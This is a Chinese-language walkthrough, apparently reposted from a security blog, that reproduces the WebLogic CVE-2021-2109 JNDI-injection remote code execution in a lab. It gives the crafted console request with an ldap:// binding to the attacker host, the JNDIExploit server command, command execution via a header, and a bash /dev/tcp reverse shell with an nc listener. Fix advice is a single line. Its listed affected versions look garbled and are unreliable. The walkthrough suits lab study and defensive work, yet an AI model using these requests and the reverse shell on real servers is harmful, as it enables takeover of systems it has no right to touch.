利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

一、漏洞描述

2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。

影响版本

  1. WebLogic 3.6.0.0
  2. WebLogic 1.3.0.0
  3. WebLogic 2.1.3.0
  4. WebLogic 2.1.4.0
  5. WebLogic 1.1.0.0

环境搭建

攻击机(kali):192.168.159.131  靶机:192.168.159.139

这里使用docker来搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

访问http://your-ip:49163/console即可看到页面

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

漏洞复现

使用burpsuit截取访问http://your-ip:49163/console报文,发送到repeater模块

1、将GET /console/console.portal?_nfpb=true HTTP/1.1修改为POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.159;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

请注意192.168.159;131地址的第三位后面为分号,192.168.159;131为启动LDAP服务的攻击机IP

2、在cookie上方添加“cmd:id”来获取靶机服务器id信息,如下图所示

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

3、在攻击机上启动LDAP

下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.159.131

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

4、重放修改过的报文,成功获取到靶机上的id信息

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

5、反弹shell

http://www.jackson-t.ca/runtime-exec-payloads.html网站将bash -i >& /dev/tcp/192.168.159.131/2333 0>&1 进行base64编码

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

将编码后的反弹shell命令复制到下图cmd后面进行重放,同时在攻击机上开启nc –lvvp 2333命令监听2333端口,点击发送

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

成功反弹回shell

利用Weblogic Server远程代码执行(CVE-2021-2109 )漏洞反弹shell

修复建议

升级官方安全补丁

相关推荐: 攻击者可利用DNSpooq漏洞劫持DNS,数百万设备受到影响

以色列安全咨询公司JSOF披露了七个Dnsmasq漏洞,这些漏洞被统称为DNSpooq,可被攻击者用于发起DNS缓存投毒、远程执行代码和拒绝服务攻击,数百万设备受到影响。 Dnsmasq是一个流行的、开源的域名系统(DNS)转发软件,经常用于将DNS缓存和动态…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/5586.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注